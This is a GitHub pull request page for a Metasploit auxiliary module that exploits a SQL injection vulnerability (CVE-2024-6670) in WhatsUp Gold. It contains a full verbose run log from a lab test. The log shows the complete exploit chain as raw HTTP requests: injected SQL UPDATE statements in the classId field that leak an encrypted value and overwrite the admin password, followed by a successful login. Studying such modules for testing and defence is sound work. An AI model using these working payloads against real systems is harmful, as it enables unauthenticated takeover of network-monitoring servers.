WhatsUp Gold SQL Injection (CVE-2024-6670) Module #19436
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
WhatsUp Gold SQL Injection (CVE-2024-6670)
cleanup, version check, documentation
|
Added documentation, version check and some minor code improvements. Also tested against one more vulnerable version. The module is ready for review: |
|
Unfortunately, the vendor only grants trial licenses for the most recent version. |
|
I can share a PCAP file with the traffic when I run the module in my lab if that would help to confirm that the module works as described? |
jheysel-r7
reviewed
Sep 5, 2024
|
I've sent an email with the debugging output and a PCAP file. |
Hello @h4x-x0r, probably the email got blocked / flagged, are you by any chance in the Metasploit Slack ? |
|
Yes, I'll send you a message via Slack. |
dledda-r7
approved these changes
Sep 20, 2024
There was a problem hiding this comment.
Reviewed logs and source code. Looks good to me.
Logs
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > use auxiliary/admin/http/whatsup_gold_sqli
msf6 auxiliary(admin/http/whatsup_gold_sqli) > set RHOSTS 192.168.217.143
RHOSTS => 192.168.217.143
msf6 auxiliary(admin/http/whatsup_gold_sqli) > show options
Module options (auxiliary/admin/http/whatsup_gold_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
NEW_PASSWORD lpLNEWATnGYb yes Password to be used when creating a new user with admin privileges
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.217.143 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL True no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path
USERNAME admin yes Username of which to update the password (default: admin)
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/http/whatsup_gold_sqli) > set verbose true
verbose => true
msf6 auxiliary(admin/http/whatsup_gold_sqli) > set HTTPTRACE true
HTTPTRACE => true
msf6 auxiliary(admin/http/whatsup_gold_sqli) > exploit
[*] Running module against 192.168.217.143
[*] Running automatic check ("set AutoCheck false" to disable)
####################
# Request:
####################
GET /NmConsole/app.json HTTP/1.1
Host: 192.168.217.143
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
####################
# Response:
####################
HTTP/1.1 200 OK
Content-Type: application/json
Last-Modified: Fri, 24 May 2024 06:39:30 GMT
Accept-Ranges: bytes
ETag: "07d4121a5adda1:0"
Server: Microsoft-IIS/10.0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 13 Sep 2024 16:54:53 GMT
Content-Length: 8837
{"packages":{"APM":{"css":true,"included":true,"namespace":"APM","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug"],"theme":"theme-wug","version":"19.1.0"},"Agent":{"css":true,"included":true,"namespace":"Agent","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug"],"version":"1.0.0"},"Cloud":{"css":true,"included":true,"namespace":"Cloud","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug"],"theme":"theme-wug","version":"19.1.0"},"Configured":{"css":true,"included":true,"namespace":"Configured","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug"],"theme":"theme-wug","version":"19.1.0"},"Connected":{"css":true,"included":true,"namespace":"Connected","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug"],"theme":"theme-wug","version":"19.1.0"},"Core":{"css":true,"included":true,"namespace":"Core","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux"],"theme":"theme-wug","version":"19.1.0"},"LM":{"css":true,"included":true,"namespace":"LM","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug","Agent"],"version":"1.0.0"},"Membership":{"css":true,"included":true,"namespace":"Membership","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core"],"theme":"theme-wug","version":"19.1.0"},"NMD3":{"css":true,"included":true,"namespace":"NMD3","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core"],"theme":"theme-wug","version":"19.1.0"},"Navigation":{"css":true,"included":true,"namespace":"Navigation","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core"],"theme":"theme-wug","version":"19.1.0"},"Nta":{"css":true,"included":true,"namespace":"Nta","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug"],"theme":"theme-wug","version":"19.1.0"},"Reporting":{"css":true,"included":true,"namespace":"Reporting","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Navigation"],"theme":"theme-wug","version":"19.1.0"},"Virtual":{"css":true,"included":true,"namespace":"Virtual","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug"],"theme":"theme-wug","version":"19.1.0"},"Wireless":{"css":true,"included":true,"namespace":"Wireless","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting","Wug"],"theme":"theme-wug","version":"19.1.0"},"Wug":{"css":true,"included":true,"namespace":"Wug","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp","theme-wug","ux","Core","Membership","Navigation","NMD3","Reporting"],"theme":"theme-wug","version":"19.1.0"},"classic":{"css":true,"included":true,"language":{"js":{"input":{"version":"ES5"}}},"namespace":"Ext","required":true,"requires":["ext","core"],"version":"6.6.0"},"cmd":{"version":"6.7.0.63"},"core":{"css":true,"included":true,"required":true,"requires":["ext","classic"],"version":"6.6.0"},"ext":{"css":true,"included":true,"language":{"js":{"input":{"version":"ES5"}}},"license":"dev","namespace":"Ext","required":true,"requires":[],"version":"6.7.0.210"},"font-awesome":{"css":true,"included":true,"namespace":"Ext","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune"],"theme":"theme-neptune","version":"4.7.0"},"theme-base":{"css":true,"included":true,"namespace":"Ext","required":true,"requires":["ext","core","classic"],"version":"6.6.0"},"theme-crisp":{"css":true,"extend":"theme-neptune","included":true,"namespace":"Ext","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune"],"version":"6.6.0"},"theme-neptune":{"css":true,"extend":"theme-neutral","included":true,"namespace":"Ext","required":true,"requires":["ext","core","classic","theme-base","theme-neutral"],"version":"6.6.0"},"theme-neutral":{"css":true,"extend":"theme-base","included":true,"namespace":"Ext","required":true,"requires":["ext","core","classic","theme-base"],"version":"6.6.0"},"theme-wug":{"css":true,"extend":"ext-theme-crisp","included":true,"namespace":"Theme.wug","required":true,"requires":["ext","core","classic","theme-base","theme-neutral","theme-neptune","theme-crisp"],"version":"19.1.0"},"ux":{"css":true,"included":true,"namespace":"Ext","required":true,"requires":["ext","core","classic"],"version":"6.6.0"}},"js":[{"remote":false,"path":"resources/libs/jquery-3.6.0.min.js"},{"remote":false,"path":"resources/libs/jquery-ui.min.js"},{"remote":false,"path":"resources/libs/v10.0.7-i18next.min.js"},{"remote":false,"path":"resources/libs/i18nextXHRBackend.min.js"},{"remote":false,"path":"resources/libs/datajs-1.1.1.min.js"},{"remote":false,"path":"resources/libs/ipaddr.min.js"},{"remote":false,"path":"resources/libs/moment.min.js"},{"remote":false,"path":"resources/libs/jquery.signalR-2.2.0.min.js"},{"remote":true,"path":"/NMConsole/api/realtime/hubs"},{"remote":false,"path":"resources/libs/d3v5.min.js"},{"remote":false,"path":"resources/libs/topojson.min.js"},{"remote":false,"path":"resources/libs/oidc-client.min.js"},{"remote":false,"path":"resources/libs/oidc-client.rsa256.min.js"},{"remote":false,"path":"resources/libs/d3.min.js"},{"remote":false,"path":"resources/libs/d3-collection.min.js"},{"remote":false,"path":"resources/libs/d3-dispatch.min.js"},{"remote":false,"path":"resources/libs/d3-quadtree.min.js"},{"remote":false,"path":"resources/libs/d3-timer.min.js"},{"remote":false,"path":"resources/libs/d3-force.min.js"},{"remote":false,"path":"resources/libs/d3-array.min.js"},{"remote":false,"path":"resources/libs/d3-color.min.js"},{"remote":false,"path":"resources/libs/d3-format.min.js"},{"remote":false,"path":"resources/libs/d3-interpolate.min.js"},{"remote":false,"path":"resources/libs/d3-path.min.js"},{"remote":false,"path":"resources/libs/d3-polygon.min.js"},{"remote":false,"path":"resources/libs/d3-scale.min.js"},{"remote":false,"path":"resources/libs/d3-shape.min.js"},{"remote":false,"path":"resources/libs/d3-selection.min.js"},{"remote":false,"path":"resources/libs/d3-selection-multi.min.js"},{"remote":false,"path":"resources/libs/highcharts.min.js"},{"remote":false,"path":"resources/libs/highcharts-regression.js"},{"remote":false,"path":"resources/libs/highstock.minmax.js"},{"remote":false,"path":"resources/libs/toggles.min.js"},{"remote":false,"path":"resources/libs/xml2json.min.js"},{"path":"app-23.1.3.js"}],"css":[{"remote":false,"exclude":["fashion"],"path":"resources/css/font-awesome.min.css"},{"remote":false,"exclude":["fashion"],"path":"resources/css/font-translation.css"},{"remote":false,"exclude":["fashion"],"path":"resources/css/jquery-ui.min.css"},{"remote":false,"exclude":["fashion"],"path":"resources/css/radial-progress.min.css"},{"exclude":["fashion"],"path":"resources/css/toggles.css"},{"exclude":["fashion"],"path":"resources/css/toggles-light.css"},{"remote":false,"exclude":["fashion"],"path":"resources/NM-all_1.css"},{"remote":false,"exclude":["fashion"],"path":"resources/NM-all_2.css"},{"remote":false,"exclude":["fashion"],"path":"resources/NM-all_3.css"},{"remote":false,"exclude":["fashion"],"path":"resources/NM-all_4.css"}],"cache":{"enable":true,"deltas":true},"fashion":{"inliner":{"enable":false}},"name":"NM","version":"23.1.3","framework":"ext","toolkit":"classic","theme":"theme-wug","loader":{"cache":"20240523233820","cacheParam":"_dc"},"id":"16f6ac6a-250f-4f0d-b5b7-14211c831454","hash":"71a496e19f9ae7e58f65031506bddad6c65f45f5","profile":"","resources":{"path":"resources"}}
[*] Version retrieved: 23.1.3
[+] The target appears to be vulnerable. Version: 23.1.3
####################
# Request:
####################
POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1
Host: 192.168.217.143
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/json
Content-Length: 71
{"KeyStorePassword":"lpLNEWATnGYb","TrustStorePassword":"lpLNEWATnGYb"}
####################
# Response:
####################
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Server: Microsoft-IIS/10.0
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=2j02pdempb44vlrxwhxsmk4m; path=/; secure; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 13 Sep 2024 16:54:55 GMT
Content-Length: 0
####################
# Request:
####################
POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
Host: 192.168.217.143
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/json
Content-Length: 243
{"deviceId":"94866","classId":"DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='vQOSlAItJx'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--","range":"2","n":"6","start":"5","end":"5"}
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
Set-Cookie: ASP.NET_SessionId=uq2wlm5ankvzmtsgazpt3sbs; path=/; secure; HttpOnly; SameSite=Lax
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 13 Sep 2024 16:54:55 GMT
Content-Length: 5
false
####################
# Request:
####################
GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1
Host: 192.168.217.143
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
Set-Cookie: ASP.NET_SessionId=gedyixd4w330wp510g054s1k; path=/; secure; HttpOnly; SameSite=Lax
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 13 Sep 2024 16:54:55 GMT
Content-Length: 4930
[{"Id":"ID:0","DisplayName":"No Filter","IsCategory":true},{"Id":"CLASSID:2AED4F63-E83B-4858-8F3E-1683373065DA","DisplayName":"Failover","IsCategory":true},{"Id":"ID:12","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:F7E947E9-BDF0-41C4-B179-E4E9CD208C17","DisplayName":"LM Filter Frequency","IsCategory":true},{"Id":"ID:18","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"ID:19","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:8190340A-F1E2-4B39-A27D-B62E0370F71E","DisplayName":"Network Traffic Analyzer Conversation Partners","IsCategory":true},{"Id":"ID:7","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:4B2DD756-F025-4B71-9AE7-9C602FB94556","DisplayName":"Network Traffic Analyzer Failed Connections","IsCategory":true},{"Id":"ID:8","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:60AA7878-034E-40D8-ABA6-AFE50D8E395A","DisplayName":"Network Traffic Analyzer Interface Traffic","IsCategory":true},{"Id":"ID:9","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:44E2745E-8699-4853-A437-E09DD9171A4B","DisplayName":"Network Traffic Analyzer Suspicious Connections","IsCategory":true},{"Id":"ID:20","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:D3596E60-D462-4DDB-933B-05915DB25C34","DisplayName":"Network Traffic Analyzer Top Sender/Receiver","IsCategory":true},{"Id":"ID:10","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:E67C2E8B-F31E-429D-8892-6BF1C9940BC1","DisplayName":"Performance CPU","IsCategory":true},{"Id":"ID:1","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:ADDEA5F5-AF11-448D-9A55-A4F5DFB79AE3","DisplayName":"Performance Disk","IsCategory":true},{"Id":"ID:2","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:2F8AFABF-4F4F-4304-AD4E-B828FAE1D337","DisplayName":"Performance Interface","IsCategory":true},{"Id":"ID:3","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:81EF5B8E-D950-419A-9917-FA2A5B0661B7","DisplayName":"Performance Memory","IsCategory":true},{"Id":"ID:4","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:EDF1024D-8393-4BC0-840C-5A340FF2C08C","DisplayName":"Performance Ping Availability","IsCategory":true},{"Id":"ID:5","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:B967A967-DC54-4FB1-8384-50B83C67CE03","DisplayName":"Performance Ping Response Time","IsCategory":true},{"Id":"ID:6","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:7DDE30A0-20F5-4C47-AEAE-0D578954EEE1","DisplayName":"WhatsUp Health","IsCategory":true},{"Id":"ID:11","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:3E020ECA-42DB-49B8-84A7-300E3219A0B6","DisplayName":"Wireless Access Point Over Subscription","IsCategory":true},{"Id":"ID:13","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:61260AB3-9B98-4434-A065-2532C9FC4F6C","DisplayName":"Wireless Access Point RSSI","IsCategory":true},{"Id":"ID:14","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:3B682F7E-2CF0-4978-9FAE-698936BC7B1C","DisplayName":"Wireless CPU","IsCategory":true},{"Id":"ID:15","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:B2170FEE-BEF1-48BA-A893-DDB215F19FB3","DisplayName":"Wireless Excessive Rogues","IsCategory":true},{"Id":"ID:17","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false},{"Id":"CLASSID:CD66081C-41A2-4797-B519-ECEC086C8177","DisplayName":"Wireless Memory","IsCategory":true},{"Id":"ID:16","DisplayName":"vQOSlAItJx3,0,0,0,16,0,0,0,198,253,140,229,45,150,229,51,11,86,205,83,131,28,164,70","IsCategory":false}]
[*] Encrypted password: 0x0300000010000000C6FD8CE52D96E5330B56CD53831CA446
####################
# Request:
####################
POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
Host: 192.168.217.143
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/json
Content-Length: 223
{"deviceId":"94866","classId":"DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = 0x0300000010000000C6FD8CE52D96E5330B56CD53831CA446 where sUserName = 'admin';--","range":"7","n":"3","start":"3","end":"5"}
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
Set-Cookie: ASP.NET_SessionId=tnbrbdaz2kkpsjbkpve5ugr5; path=/; secure; HttpOnly; SameSite=Lax
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 13 Sep 2024 16:54:55 GMT
Content-Length: 5
false
####################
# Request:
####################
POST /NmConsole/User/LoginAjax HTTP/1.1
Host: 192.168.217.143
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
username=admin&password=lpLNEWATnGYb&rememberMe=false
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
Set-Cookie: .ASPXAUTH=BCA616405D1B302CEC3D49BA822DFB85953466E8CBB2F47D42F31A7B2A7C3E3DCFF348ED4816D1C2E4ED91A6EE0E2DB563EFC1BB41B6F033AC44AC6CAE15470EB5C3AF1D7C44AD7EFA4C51F02EE8477A2171E56E194B293F6D3D5D6459087BC5; path=/; secure; HttpOnly; SameSite=Lax, langid=1033; path=/; secure; HttpOnly
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 13 Sep 2024 16:54:55 GMT
Content-Length: 54
{"authenticated":true,"message":"","username":"admin"}
[+] New password for admin was successfully set:
admin:lpLNEWATnGYb
[+] Login at: https://192.168.217.143/NmConsole/#home
[*] Auxiliary module execution completed
jheysel-r7
reviewed
Sep 25, 2024
There was a problem hiding this comment.
Hey @h4x-x0r. Two final minor comments, after these are addressed I think it should be good to land.
minor fixes
jheysel-r7
added
the
rn-modules
Release NotesThis is a new module which exploits a SQL injection vulnerability in WhatsUp Gold versions before v24.0.0. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This is a new module which exploits a SQL injection vulnerability in WhatsUp Gold < v24.0.0 (CVE-2024-6670).
Successful exploitation allows an unauthenticated remote attacker to change the password of the admin user.
Verification Steps
msfconsoleuse auxiliary/admin/http/whatsup_gold_sqliset RHOSTS <IP>runThe password of the admin user will get updated to the one specified in
NEW_PASSWORD.Successfully tested on